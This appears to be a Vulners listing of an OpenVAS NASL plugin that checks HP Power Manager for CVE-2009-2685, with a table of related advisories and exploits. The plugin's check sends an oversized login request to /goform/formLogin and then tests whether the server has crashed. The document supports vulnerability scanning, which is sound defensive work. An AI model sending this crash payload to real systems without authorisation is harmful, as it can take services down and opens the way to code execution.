HP Power Manager Management Web Server Login RCE Vulnerability
🗓️ 13 Nov 2009 00:00:00Reported by Copyright (C) 2009 Greenbone AGType
openvas🔗 plugins.openvas.org👁 46 Views
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| HP Power Manager < 4.2.10 Multiple Vulnerabilities | 22 Jan 201000:00 | – | nessus | |
| HP Power Manager < 4.2.10 | 21 Jan 201000:00 | – | nessus | |
| CVE-2009-2685 | 16 Nov 200900:00 | – | circl | |
| Update Protection against HP Power Manager Remote Code Execution | 19 Nov 200900:00 | – | checkpoint_advisories | |
| HP Power Manager Remote Code Execution (CVE-2009-2685) | 31 Jan 201000:00 | – | checkpoint_advisories | |
| CVE-2009-2685 | 6 Nov 200915:00 | – | cve | |
| CVE-2009-2685 | 6 Nov 200915:00 | – | cvelist | |
| DSquare Exploit Pack: D2SEC_HPPM | 6 Nov 200915:30 | – | d2 | |
| Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow | 16 Nov 200900:00 | – | exploitdb | |
| Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit) | 24 Nov 201000:00 | – | exploitdb |
10
# SPDX-FileCopyrightText: 2009 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:hp:power_manager";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100346");
script_version("2025-01-17T15:39:18+0000");
script_tag(name:"last_modification", value:"2025-01-17 15:39:18 +0000 (Fri, 17 Jan 2025)");
script_tag(name:"creation_date", value:"2009-11-13 18:49:45 +0100 (Fri, 13 Nov 2009)");
script_cve_id("CVE-2009-2685");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_name("HP Power Manager Management Web Server Login RCE Vulnerability");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/36933");
script_xref(name:"URL", value:"http://h18000.www1.hp.com/products/servers/proliantstorage/power-protection/software/power-manager/index.html");
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/507697");
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/507708");
script_xref(name:"URL", value:"http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01905743");
script_xref(name:"URL", value:"http://www.zerodayinitiative.com/advisories/ZDI-09-081/");
script_category(ACT_DENIAL);
script_family("Web application abuses");
script_copyright("Copyright (C) 2009 Greenbone AG");
script_dependencies("hp_power_manager_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("hp_power_manager/detected");
script_tag(name:"solution", value:"The vendor has released updates and an advisory. Please see the references
for details.");
script_tag(name:"summary", value:"HP Power Manager is prone to a remote code execution (RCE) vulnerability because it
fails to properly bounds-check user-supplied data.");
script_tag(name:"impact", value:"An attacker can exploit this issue to execute arbitrary code with SYSTEM
credentials, resulting in a complete compromise of the affected computer. Failed exploit attempts will result in a
denial-of-service condition.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE))
exit(0);
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
variables = "HtmlOnly=true&Login=" + crap(length:100000) + "&Password=bla&loginButton=Submit%20Login";
host = http_host_name( port:port );
filename = dir + "/goform/formLogin";
req = string( "POST ", filename, " HTTP/1.0\r\n",
"Referer: ","http://", host, filename, "\r\n",
"Host: ", host, "\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(variables),
"\r\n\r\n",
variables
);
http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
sleep(2);
if(http_is_dead(port:port)) {
security_message(port:port);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jan 2025 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 210
EPSS0.76706